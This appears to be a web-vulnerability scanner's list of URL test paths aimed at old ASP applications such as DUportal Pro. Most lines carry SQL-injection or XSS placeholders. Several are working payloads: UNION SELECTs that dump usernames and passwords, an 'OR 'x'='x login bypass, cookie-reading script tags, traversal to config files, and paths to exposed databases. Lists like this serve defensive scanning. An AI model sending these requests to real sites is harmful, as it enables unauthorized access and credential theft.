/dUpro/Events/../Entertainments/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Entertainments
/dUpro/events/../Entertainments/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Entertainments
/dUpro/Events/../events/default.asp?iChannel=6&iDate=3%2f19%2f2005&nChannel=&#039;SQL_INJECTION
/dUpro/events/../events/default.asp?iChannel=6&iDate=3%2f19%2f2005&nChannel=&#039;SQL_INJECTION
/dUpro/Events/../Events/default.asp?iChannel=6&nChannel=&#039;SQL_INJECTION
/dUpro/events/../Events/default.asp?iChannel=6&nChannel=&#039;SQL_INJECTION
/dUpro/Events/../events/default.asp?iChannel=&#039;SQL_INJECTION&iDate=3%2f19%2f2005&nChannel=Events
/dUpro/events/../events/default.asp?iChannel=&#039;SQL_INJECTION&iDate=3%2f19%2f2005&nChannel=Events
/dUpro/Events/../Events/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Events
/dUpro/events/../Events/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Events
/dUpro/Events/../Files/default.asp?iChannel=4&nChannel=&#039;SQL_INJECTION
/dUpro/events/../Files/default.asp?iChannel=4&nChannel=&#039;SQL_INJECTION
/dUpro/Events/../Files/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Files
/dUpro/events/../Files/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Files
/dUpro/Events/../Links/default.asp?iChannel=5&nChannel=&#039;SQL_INJECTION
/dUpro/events/../Links/default.asp?iChannel=5&nChannel=&#039;SQL_INJECTION
/dUpro/Events/../Links/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Links
/dUpro/events/../Links/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Links
/dUpro/Events/../News/default.asp?iChannel=1&nChannel=&#039;SQL_INJECTION
/dUpro/events/../News/default.asp?iChannel=1&nChannel=&#039;SQL_INJECTION
/dUpro/Events/../News/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=News
/dUpro/events/../News/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=News
/dUpro/Events/../Pictures/default.asp?iChannel=3&nChannel=&#039;SQL_INJECTION
/dUpro/events/../Pictures/default.asp?iChannel=3&nChannel=&#039;SQL_INJECTION
/dUpro/Events/../Pictures/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Pictures
/dUpro/events/../Pictures/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Pictures
/dUpro/Events/../Polls/default.asp?iChannel=15&nChannel=&#039;SQL_INJECTION
/dUpro/events/../Polls/default.asp?iChannel=15&nChannel=&#039;SQL_INJECTION
/dUpro/Events/../Polls/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Polls
/dUpro/events/../Polls/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Polls
/dUpro/Events/../Products/default.asp?iChannel=8&nChannel=&#039;SQL_INJECTION
/dUpro/events/../Products/default.asp?iChannel=8&nChannel=&#039;SQL_INJECTION
/dUpro/Events/../Products/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Products
/dUpro/events/../Products/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Products
/dUpro/Events/../Topics/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Topics
/dUpro/events/../Topics/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Topics
/dUpro/Events/default.asp?iChannel=6&nChannel=&#039;SQL_INJECTION
/dUpro/events/default.asp?iChannel=6&nChannel=&#039;SQL_INJECTION
/dUpro/Events/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Events
/dUpro/events/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Events
/dUpro/Files/../Articles/default.asp?iChannel=2&nChannel=&#039;SQL_INJECTION
/dUpro/Files/../Articles/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Articles
/dUpro/Files/../Businesses/default.asp?iChannel=18&nChannel=&#039;SQL_INJECTION
/dUpro/Files/../Businesses/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Businesses
/dUpro/Files/../Classifieds/default.asp?iChannel=7&nChannel=&#039;SQL_INJECTION
/dUpro/Files/../Classifieds/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Classifieds
/dUpro/Files/../Entertainments/default.asp?iChannel=19&nChannel=&#039;SQL_INJECTION
/dUpro/Files/../Entertainments/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Entertainments
/dUpro/Files/../Events/default.asp?iChannel=6&nChannel=&#039;SQL_INJECTION
/dUpro/Files/../events/default.asp?iChannel=6&nChannel=&#039;SQL_INJECTION&iDate=4%2f1%2f2005
/dUpro/Files/../Events/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Events
/dUpro/Files/../events/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Events&iDate=4%2f1%2f2005
/dUpro/Files/../Files/default.asp?iChannel=4&nChannel=&#039;SQL_INJECTION
/dUpro/Files/../Files/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Files
/dUpro/Files/../Links/default.asp?iChannel=5&nChannel=&#039;SQL_INJECTION
/dUpro/Files/../Links/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Links
/dUpro/Files/../News/default.asp?iChannel=1&nChannel=&#039;SQL_INJECTION
/dUpro/Files/../News/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=News
/dUpro/Files/../Pictures/default.asp?iChannel=3&nChannel=&#039;SQL_INJECTION
/dUpro/Files/../Pictures/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Pictures
/dUpro/Files/../Polls/default.asp?iChannel=15&nChannel=&#039;SQL_INJECTION
/dUpro/Files/../Polls/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Polls
/dUpro/Files/../Products/default.asp?iChannel=8&nChannel=&#039;SQL_INJECTION
/dUpro/Files/../Products/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Products
/dUpro/Files/../Topics/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Topics
/dUpro/Files/default.asp?iChannel=4&nChannel=&#039;SQL_INJECTION
/dUpro/Files/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Files
/dUpro/home/../Articles/default.asp?iChannel=2&nChannel=&#039;SQL_INJECTION
/dUpro/home/../Articles/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Articles
/dUpro/home/../Businesses/default.asp?iChannel=18&nChannel=&#039;SQL_INJECTION
/dUpro/home/../Businesses/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Businesses
/dUpro/home/../Classifieds/default.asp?iChannel=7&nChannel=&#039;SQL_INJECTION
/dUpro/home/../Classifieds/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Classifieds
/dUpro/home/../Entertainments/default.asp?iChannel=19&nChannel=&#039;SQL_INJECTION
/dUpro/home/../Entertainments/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Entertainments
/dUpro/home/../Events/default.asp?iChannel=6&nChannel=&#039;SQL_INJECTION
/dUpro/home/../events/default.asp?iChannel=6&nChannel=&#039;SQL_INJECTION&iDate=4%2f1%2f2005
/dUpro/home/../Events/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Events
/dUpro/home/../events/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Events&iDate=4%2f1%2f2005
/dUpro/home/../Files/default.asp?iChannel=4&nChannel=&#039;SQL_INJECTION
/dUpro/home/../Files/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Files
/dUpro/home/../Links/default.asp?iChannel=5&nChannel=&#039;SQL_INJECTION
/dUpro/home/../Links/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Links
/dUpro/home/../News/default.asp?iChannel=1&nChannel=&#039;SQL_INJECTION
/dUpro/home/../News/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=News
/dUpro/home/../Pictures/default.asp?iChannel=3&nChannel=&#039;SQL_INJECTION
/dUpro/home/../Pictures/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Pictures
/dUpro/home/../Polls/default.asp?iChannel=15&nChannel=&#039;SQL_INJECTION
/dUpro/home/../Polls/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Polls
/dUpro/home/../Products/default.asp?iChannel=8&nChannel=&#039;SQL_INJECTION
/dUpro/home/../Products/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Products
/dUpro/home/../Topics/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Topics
/dUpro/Pictures/../Articles/default.asp?iChannel=2&nChannel=&#039;SQL_INJECTION
/dUpro/Pictures/../Articles/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Articles
/dUpro/Pictures/../Businesses/default.asp?iChannel=18&nChannel=&#039;SQL_INJECTION
/dUpro/Pictures/../Businesses/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Businesses
/dUpro/Pictures/../Classifieds/default.asp?iChannel=7&nChannel=&#039;SQL_INJECTION
/dUpro/Pictures/../Classifieds/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Classifieds
/dUpro/Pictures/../Entertainments/default.asp?iChannel=19&nChannel=&#039;SQL_INJECTION
/dUpro/Pictures/../Entertainments/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Entertainments
/dUpro/Pictures/../Events/default.asp?iChannel=6&nChannel=&#039;SQL_INJECTION
/dUpro/Pictures/../events/default.asp?iChannel=6&nChannel=&#039;SQL_INJECTION&iDate=4%2f1%2f2005
/dUpro/Pictures/../Events/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Events
/dUpro/Pictures/../events/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Events&iDate=4%2f1%2f2005
/dUpro/Pictures/../Files/default.asp?iChannel=4&nChannel=&#039;SQL_INJECTION
/dUpro/Pictures/../Files/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Files
/dUpro/Pictures/../Links/default.asp?iChannel=5&nChannel=&#039;SQL_INJECTION
/dUpro/Pictures/../Links/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Links
/dUpro/Pictures/../News/default.asp?iChannel=1&nChannel=&#039;SQL_INJECTION
/dUpro/Pictures/../News/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=News
/dUpro/Pictures/../Pictures/default.asp?iChannel=3&nChannel=&#039;SQL_INJECTION
/dUpro/Pictures/../Pictures/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Pictures
/dUpro/Pictures/../Polls/default.asp?iChannel=15&nChannel=&#039;SQL_INJECTION
/dUpro/Pictures/../Polls/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Polls
/dUpro/Pictures/../Products/default.asp?iChannel=8&nChannel=&#039;SQL_INJECTION
/dUpro/Pictures/../Products/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Products
/dUpro/Pictures/../Topics/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Topics
/dUpro/Pictures/default.asp?iChannel=3&nChannel=&#039;SQL_INJECTION
/dUpro/Pictures/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Pictures
/dUpro/polls/../polls/../Articles/default.asp?iChannel=2&nChannel=&#039;SQL_INJECTION
/dUpro/polls/../polls/../Articles/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Articles
/dUpro/polls/../polls/../Businesses/default.asp?iChannel=18&nChannel=&#039;SQL_INJECTION
/dUpro/polls/../polls/../Businesses/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Businesses
/dUpro/polls/../polls/../Classifieds/default.asp?iChannel=7&nChannel=&#039;SQL_INJECTION
/dUpro/polls/../polls/../Classifieds/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Classifieds
/dUpro/polls/../polls/../Entertainments/default.asp?iChannel=19&nChannel=&#039;SQL_INJECTION
/dUpro/polls/../polls/../Entertainments/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Entertainments
/dUpro/polls/../polls/../Events/default.asp?iChannel=6&nChannel=&#039;SQL_INJECTION
/dUpro/polls/../polls/../events/default.asp?iChannel=6&nChannel=&#039;SQL_INJECTION&iDate=4%2f1%2f2005
/dUpro/polls/../polls/../Events/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Events
/dUpro/polls/../polls/../events/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Events&iDate=4%2f1%2f2005
/dUpro/polls/../polls/../Files/default.asp?iChannel=4&nChannel=&#039;SQL_INJECTION
/dUpro/polls/../polls/../Files/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Files
/dUpro/polls/../polls/../Links/default.asp?iChannel=5&nChannel=&#039;SQL_INJECTION
/dUpro/polls/../polls/../Links/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Links
/dUpro/polls/../polls/../News/default.asp?iChannel=1&nChannel=&#039;SQL_INJECTION
/dUpro/polls/../polls/../News/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=News
/dUpro/polls/../polls/../Pictures/default.asp?iChannel=3&nChannel=&#039;SQL_INJECTION
/dUpro/polls/../polls/../Pictures/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Pictures
/dUpro/polls/../polls/../Polls/default.asp?iChannel=15&nChannel=&#039;SQL_INJECTION
/dUpro/polls/../polls/../Polls/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Polls
/dUpro/polls/../polls/../Products/default.asp?iChannel=8&nChannel=&#039;SQL_INJECTION
/dUpro/polls/../polls/../Products/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Products
/dUpro/polls/../polls/../Topics/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Topics
/dUpro/polls/../polls/default.asp?iChannel=&nChannel=&#039;SQL_INJECTION
/dUpro/polls/../polls/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=
/dUpro/Topics/../Articles/default.asp?iChannel=2&nChannel=&#039;SQL_INJECTION
/dUpro/Topics/../Articles/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Articles
/dUpro/Topics/../Businesses/default.asp?iChannel=18&nChannel=&#039;SQL_INJECTION
/dUpro/Topics/../Businesses/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Businesses
/dUpro/Topics/../Classifieds/default.asp?iChannel=7&nChannel=&#039;SQL_INJECTION
/dUpro/Topics/../Classifieds/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Classifieds
/dUpro/Topics/../Entertainments/default.asp?iChannel=19&nChannel=&#039;SQL_INJECTION
/dUpro/Topics/../Entertainments/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Entertainments
/dUpro/Topics/../Events/default.asp?iChannel=6&nChannel=&#039;SQL_INJECTION
/dUpro/Topics/../Events/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Events
/dUpro/Topics/../Files/default.asp?iChannel=4&nChannel=&#039;SQL_INJECTION
/dUpro/Topics/../Files/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Files
/dUpro/Topics/../Links/default.asp?iChannel=5&nChannel=&#039;SQL_INJECTION
/dUpro/Topics/../Links/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Links
/dUpro/Topics/../News/default.asp?iChannel=1&nChannel=&#039;SQL_INJECTION
/dUpro/Topics/../News/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=News
/dUpro/Topics/../Pictures/default.asp?iChannel=3&nChannel=&#039;SQL_INJECTION
/dUpro/Topics/../Pictures/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Pictures
/dUpro/Topics/../Polls/default.asp?iChannel=15&nChannel=&#039;SQL_INJECTION
/dUpro/Topics/../Polls/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Polls
/dUpro/Topics/../Products/default.asp?iChannel=8&nChannel=&#039;SQL_INJECTION
/dUpro/Topics/../Products/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Products
/dUpro/Topics/../topics/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=
/dUpro/Topics/../Topics/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Topics
/dUpro/Businesses/../events/default.asp?iChannel=6&nChannel=Events&iDate=&#039;SQL_ERRORS
/dUpro/Businesses/../Topics/default.asp?iChannel=16&nChannel=&#039;SQL_ERRORS
/dUpro/Classifieds/../events/default.asp?iChannel=6&nChannel=Events&iDate=&#039;SQL_ERRORS
/dUpro/Classifieds/../Topics/default.asp?iChannel=16&nChannel=&#039;SQL_ERRORS
/dUpro/Events/../events/default.asp?iChannel=6&iDate=&#039;SQL_ERRORS&nChannel=Events
/dUpro/events/../events/default.asp?iChannel=6&iDate=&#039;SQL_ERRORS&nChannel=Events
/dUpro/Events/../Topics/default.asp?iChannel=16&nChannel=&#039;SQL_ERRORS
/dUpro/events/../Topics/default.asp?iChannel=16&nChannel=&#039;SQL_ERRORS
/dUpro/Files/../events/default.asp?iChannel=6&nChannel=Events&iDate=&#039;SQL_ERRORS
/dUpro/Files/../Topics/default.asp?iChannel=16&nChannel=&#039;SQL_ERRORS
/dUpro/home/../events/default.asp?iChannel=6&nChannel=Events&iDate=&#039;SQL_ERRORS
/dUpro/home/../Topics/default.asp?iChannel=16&nChannel=&#039;SQL_ERRORS
/dUpro/Pictures/../events/default.asp?iChannel=6&nChannel=Events&iDate=&#039;SQL_ERRORS
/dUpro/Pictures/../Topics/default.asp?iChannel=16&nChannel=&#039;SQL_ERRORS
/dUpro/polls/../polls/../events/default.asp?iChannel=6&nChannel=Events&iDate=&#039;SQL_ERRORS
/dUpro/polls/../polls/../Topics/default.asp?iChannel=16&nChannel=&#039;SQL_ERRORS
/dUpro/Topics/../topics/default.asp?iChannel=16&nChannel=&#039;SQL_ERRORS
/dUpro/Topics/../Topics/default.asp?iChannel=16&nChannel=&#039;SQL_ERRORS
/Calendar/defer.asp?Event_ID='&Occurr_ID=0 
/[path]/viewDetails.asp?pid=[HERE]
/listings.asp?peopleID='[sql]
/listings.asp?sort_order='[sql]
/[TABLE-NAME]_search.asp?action=AdvancedSearch&FieldName=word
/default.asp?pg=pgLogon&dest=[XSS] 
/default.asp?view=alpha&AlphaSort=[SQL Injection]
//default.asp?In=[SQL Injection]
/default.asp?view=All&orderby=[SQL Injection]
/default.asp?Action=Search&Keyword=<script>alert("xssed")</script>
/[path]/default.asp?catID=-1%20union%20select%200,kullanici,eposta,3,4,5,sifre,7,8,9,10,11,12,13%20from%20uyeler
/prequiz.asp?examid=1&exam=[XSS]
/cgi-bin/store/__SQLUSER__ 
/addlisting.asp?cat=[xss]
/[Path]/messages.asp?forum_id=3&message_id=[SQL] 
/content.asp?CatId=&ContentType=&keywords=r0t&search=%3E&do_search=[XSS]
/content.asp?CatId=&ContentType=&keywords=r0t&search=[XSS] 
/toast.asp?action=posts&sub=search&fid=-1&author=[XSS]
/toast.asp?action=posts&sub=search&fid=-1&author=r0t&subject=[XSS] 
/toast.asp?action=posts&sub=search&fid=-1&author=r0t&subject=&message=[XSS]
/toast.asp?action=posts&sub=search&fid=-1&author=r0t&subject=&message=&dayprune=[XSS]
/midiscovery/ErrLog/mi3errors.log
/account_login.asp?Username=[XSS]
/account_login.asp?Password=[XSS]
/path/SayfalaAltList.asp?ID=-1 UNION ALL SELECT 0,kullaniciadi,sifre FROM uyeler
/?page=page&id=-164 or 1=(select top 1 user_pass from tblUsers where user_name = 'admin')
/?page=Search
/default.aspx?page=Search&app=Search&srch=[sql]
/productcart/pc/Custva.asp?redirectUrl="><script>alert(document.cookie)</script><"
/default.asp?ExecuteTheLogin=1&Users_Email=anything%27+OR+%27x%27%3D%27x&Users_Password=anything%27+OR+%27x%27%3D%27x 
/vpasp/shopdisplayproducts.asp?cat=qwerty'%20union%20select%20fldauto,fldpassword%20from%20tbluser%20where%20fldusername='admin'%20and%20fldpassword%20
/mcart2sqluk/searchAction.asp?chkText='SQL_INJECTION&strText=dcrab&chkPrice=yes&intPrice=all&chkCat=yes&strCat=1
/mcart2sqluk/searchAction.asp?chkText=yes&strText='SQL_INJECTION&chkPrice=yes&intPrice=all&chkCat=yes&strCat=1
/mcart2sqluk/searchAction.asp?chkText=yes&strText=dcrab&chkPrice='SQL_INJECTION&intPrice=all&chkCat=yes&strCat=1
/mcart2sqluk/searchAction.asp?chkText=yes&strText=dcrab&chkPrice=yes&intPrice='SQL_INJECTION&chkCat=yes&strCat=1
/mcart2sqluk/searchAction.asp?chkText=yes&strText=dcrab&chkPrice=yes&intPrice=all&chkCat='SQL_INJECTION&strCat=1
/mcart2sqluk/searchAction.asp?chkText=yes&strText=dcrab&chkPrice=yes&intPrice=all&chkCat=yes&strCat='SQL_INJECTION 
/gallery/igallery.asp?d=%5c../../%5c 
/newDetail.asp?haberNo=-9999%20union%20select%200,username,password,3,4,5%20from%20Danismanlar 
/CCMAdmin/serverlist.asp?findBy=servername&match=begins&pattern=[xss] 
/[Path]/home/signup.asp?full_name=pouya.s3rver@gmail.com&email=111-222-1933email@address.tst&pass=111-222-1933email@address.tst&address=&lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>&phone=111-222-1933email@address.com&state=0&hide_email=on&url_add=111-222-1933email@address.tst&Submit=SignUp&addit=start 
/index.asp?id=<script>("xss")</script>
/path/product.asp?productid=[SQL INJECTION]
/forum/default.asp?db=general&mode=download&idx=507&fileNum=1&filename=../conf.asp&nav=viewcontents&srhctgr=&srhstr=&page=1 
/category_news.asp?ID='[SQL]
/comersus/backofficeLite/comersus_backoffice_message.asp?message=<script>alert("VULNERABLE_TO_XSS")</script>
/filename.asp?QUERY=[XSS]&Submit=Search%21&ACTION=SEARCH 
/more.asp?ID='[SQL query]
/searchmain.asp?I1=1&area=all&cat=[xss]
/view_gallery.asp?gallery_id=809&currentpage=[SQL Injection]
/view_gallery.asp?gallery_id=[SQL injection]
/download_image.asp?image_id=[SQL Injection]
/gallery.asp?currentpage=[SQL Injection]
/view_recent.asp?currentpage=[SQL Injection]
/gallery.asp?currentpage=2&orderby=[SQL Injection]
/idealbb/error.asp?e=16&sessionID={xxxxxxxx-xxxx-xxxx-
/DUclassmate/admin/edit.asp?iPro=[SQL Inject] 
/anketv3/anket.asp?islem=oyla&id=1+union+select+0,1,username,3+from+admin
/anketv3/anket.asp?islem=oyla&id=1+union+select+0,1,password,3+from+admin 
/products/bsearch.asp?b_search=%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E&x=12&y=7 
/dUpro/Businesses/../polls/result.asp?iData=74&iCat=254&iChannel=&#039;SQL_INJECTION&nChannel=Polls
/dUpro/Businesses/../polls/result.asp?iData=&#039;SQL_INJECTION&iCat=254&iChannel=15&nChannel=Polls
/dUpro/Classifieds/../polls/result.asp?iData=74&iCat=254&iChannel=&#039;SQL_INJECTION&nChannel=Polls
/dUpro/Classifieds/../polls/result.asp?iData=&#039;SQL_INJECTION&iCat=254&iChannel=15&nChannel=Polls
/dUpro/Events/../polls/result.asp?iData=74&iCat=254&iChannel=&#039;SQL_INJECTION&nChannel=Polls
/dUpro/events/../polls/result.asp?iData=74&iCat=254&iChannel=&#039;SQL_INJECTION&nChannel=Polls
/dUpro/Events/../polls/result.asp?iData=&#039;SQL_INJECTION&iCat=254&iChannel=15&nChannel=Polls
/dUpro/events/../polls/result.asp?iData=&#039;SQL_INJECTION&iCat=254&iChannel=15&nChannel=Polls
/dUpro/Files/../polls/result.asp?iData=74&iCat=254&iChannel=&#039;SQL_INJECTION&nChannel=Polls
/dUpro/Files/../polls/result.asp?iData=&#039;SQL_INJECTION&iCat=254&iChannel=15&nChannel=Polls
/dUpro/home/../polls/result.asp?iData=74&iCat=254&iChannel=&#039;SQL_INJECTION&nChannel=Polls
/dUpro/home/../polls/result.asp?iData=&#039;SQL_INJECTION&iCat=254&iChannel=15&nChannel=Polls
/dUpro/Pictures/../polls/result.asp?iData=74&iCat=254&iChannel=&#039;SQL_INJECTION&nChannel=Polls
/dUpro/Pictures/../polls/result.asp?iData=&#039;SQL_INJECTION&iCat=254&iChannel=15&nChannel=Polls
/dUpro/polls/../polls/../polls/result.asp?iData=74&iCat=254&iChannel=&#039;SQL_INJECTION&nChannel=Polls
/dUpro/polls/../polls/../polls/result.asp?iData=&#039;SQL_INJECTION&iCat=254&iChannel=15&nChannel=Polls
/dUpro/Topics/../polls/result.asp?iData=74&iCat=254&iChannel=&#039;SQL_INJECTION&nChannel=Polls
/dUpro/Topics/../polls/result.asp?iData=&#039;SQL_INJECTION&iCat=254&iChannel=15&nChannel=Polls
/dUpro/Businesses/../polls/result.asp?iData=74&iCat=254&iChannel=15&nChannel=&#039;SQL_ERRORS
/dUpro/Businesses/../polls/result.asp?iData=74&iCat=&#039;SQL_ERRORS&iChannel=15&nChannel=Polls
/dUpro/Classifieds/../polls/result.asp?iData=74&iCat=254&iChannel=15&nChannel=&#039;SQL_ERRORS
/dUpro/Classifieds/../polls/result.asp?iData=74&iCat=&#039;SQL_ERRORS&iChannel=15&nChannel=Polls
/dUpro/Events/../polls/result.asp?iData=74&iCat=254&iChannel=15&nChannel=&#039;SQL_ERRORS
/dUpro/events/../polls/result.asp?iData=74&iCat=254&iChannel=15&nChannel=&#039;SQL_ERRORS
/dUpro/Events/../polls/result.asp?iData=74&iCat=&#039;SQL_ERRORS&iChannel=15&nChannel=Polls
/dUpro/events/../polls/result.asp?iData=74&iCat=&#039;SQL_ERRORS&iChannel=15&nChannel=Polls
/dUpro/Files/../polls/result.asp?iData=74&iCat=254&iChannel=15&nChannel=&#039;SQL_ERRORS
/dUpro/Files/../polls/result.asp?iData=74&iCat=&#039;SQL_ERRORS&iChannel=15&nChannel=Polls
/dUpro/home/../polls/result.asp?iData=74&iCat=254&iChannel=15&nChannel=&#039;SQL_ERRORS
/dUpro/home/../polls/result.asp?iData=74&iCat=&#039;SQL_ERRORS&iChannel=15&nChannel=Polls
/dUpro/Pictures/../polls/result.asp?iData=74&iCat=254&iChannel=15&nChannel=&#039;SQL_ERRORS
/dUpro/Pictures/../polls/result.asp?iData=74&iCat=&#039;SQL_ERRORS&iChannel=15&nChannel=Polls
/dUpro/polls/../polls/../polls/result.asp?iData=74&iCat=254&iChannel=15&nChannel=&#039;SQL_ERRORS
/dUpro/polls/../polls/../polls/result.asp?iData=74&iCat=&#039;SQL_ERRORS&iChannel=15&nChannel=Polls
/dUpro/Topics/../polls/result.asp?iData=74&iCat=254&iChannel=15&nChannel=&#039;SQL_ERRORS
/dUpro/Topics/../polls/result.asp?iData=74&iCat=&#039;SQL_ERRORS&iChannel=15&nChannel=Polls
/buscar.asp?p=[XSS] 
/login.asp?SessionID=[SQL]
/cat.asp?keywords=[XSS]
/admin/hosting/plandetails.asp?hostcustid=[PlanID]
/demo/owoslite/default.asp?show="><script>alert(document.cookie);</script>
/demo/owoslite/login.asp?go="><script>alert(document.cookie);</script>
/demo/owoslite/report.asp?show="><script>alert(document.cookie);</script>
/Path/blogs.asp?CID=0&AID=0&Date=%22%3E%3Cscript%3Ea lert(document.cookie);%3C/script%3E 
/vie/viewtopic.asp?forumid=48&id=2736' 
/home/index.asp?pid='/**/union/**/select/**/0,username,password,3,4,5,6,7,8,9/**/from/**/pidRoot/**/ 
/forum1/post.aspx?action=reply&threadid="><script>alert(/liscker/);</script>
/path/listpics.asp?a=show&ID=[SQL INJECTION]
/forum1/post.aspx?action=newthread"><script>alert(/liscker/)</script>
/hava.asp?il=[Xss]
/search.asp?in=y&keyword=1&submit=Search&order=tbl_classads.col_id&sort=DESC&cat=0&menuSelect=1&type=1&city=1&minprice=[xss]
/store/login.asp?message=Please+login+using+the+form+above+to+access+your+account.&redirect='"><script>alert(document.cookie)</script> 
/path/default.asp?page=[SQL INJECTION]
/forum/ZixForum.mdb
/demos/DUportalPro34Demo/home/password.asp?result=[XSS] 
/[Path]/inc_webblogmanager.asp?CategoryID=121&ItemID=[SQL]&action=view
/[path to script]/login.asp
/d/asp/SelGruFra.asp" METHOD=post>
/UblogReload/index.asp?ci='62&s=category
/UblogReload/index.asp?d=11'&m=6&y=2005&s=day
/UblogReload/index.asp?m=6'&y=2005&s=month 
/admin//accounts/UserProfile.asp?action=updateprofile"
/Forums-Path/Members1.aspx?Username=[xss]
/Forums-Path/Members1.aspx?Update=[xss]
/default.asp?skin_number=[XSS] 
/path/default.asp?page=2&order=[SQL Injection]
/www.example.com/target/path/default.asp?page=[SQL INJECTION]&order=id
/default.asp?gb=urun&id=18&ortak="<h1>Patriotic%20Hackers<h1>
/default.asp?gb=kate&kat=<script>alert(document.cookie</script>&ortak=
/default.asp?gb=kate&kat=<script>alert(document.title)</script>&ortak=
/default.asp?gb=kate&kat=AnaKart&ortak="><script>alert(document.cookie)</script> 
/default.asp?Page=2&Email=[SQL]&Password=pass&Password2=pass&FirstName=name&LastName=lastname&MailType=0 
/activeauctionsuperstore/default.asp?Sortby=ItemName&SortDir='SQL_INJECTION
/activeauctionsuperstore/default.asp?Sortby='SQL_INJECTION 
/aspbb/topic.asp?TID=[sql injection]
/aspbb/topic.asp?COMMAND=GOTOLAST&TID=[sql injection]
/eshopv-8/productsByCategory.asp?intCatalogID=&amp%3bpage=2&amp%3bstrCatalog_NAME='SQL_INJECTION
/mcart2pal/productsByCategory.asp?intCatalogID=&amp%3bpage=2&amp%3bstrCatalog_NAME='SQL_INJECTION 
/default.asp?sec=1&ma1="><script>alert("XSS");</script>
/default.asp?sec=1&tag="><script>alert("XSS");</script>
/default.asp?sec=1&ma2="><script>alert("XSS");</script>
/default.asp?sec=33&ma1=forgotpass
/[path]/login.asp?username=[SQL COMMAND] 
/[TABLE-NAME]_edit.asp?editid=2822&editid2=&editid3=&TargetPa
/path/index.asp?cat=[SQL INJECTION]
/path/index.asp?page=detail&did=[SQL INJECTION]
/asp/listings.asp?s=&lt;/textarea&gt;'"><script>alert(document.cookie)</script>
/megabbs/forums/thread-post.asp?action=writenew&fid=%0
